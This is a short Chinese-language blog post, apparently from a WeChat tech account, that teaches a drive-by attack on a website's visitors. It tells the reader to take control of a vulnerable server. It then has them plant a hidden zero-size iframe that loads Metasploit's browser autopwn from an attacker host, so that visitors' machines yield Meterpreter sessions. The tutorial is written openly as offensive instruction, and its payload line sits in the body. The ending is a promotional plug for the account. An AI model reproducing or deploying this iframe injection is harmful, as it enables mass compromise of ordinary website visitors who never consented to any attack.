# 对网站的客户进行渗透

本次的渗透主要是找到有漏洞的网站,在有漏洞的网站中嵌入隐藏的iFrame,那么访问这个网站的所有系统都会遭受来自browser autopwn服务器的攻击。我们可以利用iFrame注入实现对网站用户的大规模入侵。

攻击网站的用户

img

具体实施

首先,我们要获取一个存在漏洞的服务器的控制权限,这一点非常重要

接着,我们在网站的某个页面中,嵌入类似如下的代码:

<iframe src="http://192.168.175.128" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
1

每当有受害者访问网站时,上面的代码就会自动加载iFrame中的恶意browser autopwn。由于这段代码包含了一个iframe标签,它将会从攻击者系统中自动加载browser autopwn。我们需要保存这个文件,并允许用户对网站的访问。

受害者一旦访问了这个网页,browser autopwn将会自动在受害者的计算机上运行。我们必须确保browser autopwn模块正常运行

如果一切顺利,我们将会获得在目标系统中运行的Meterpreter。这种渗透思路是使用目标网站引诱最大数量的受害者,并进入到他们的系统中。

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!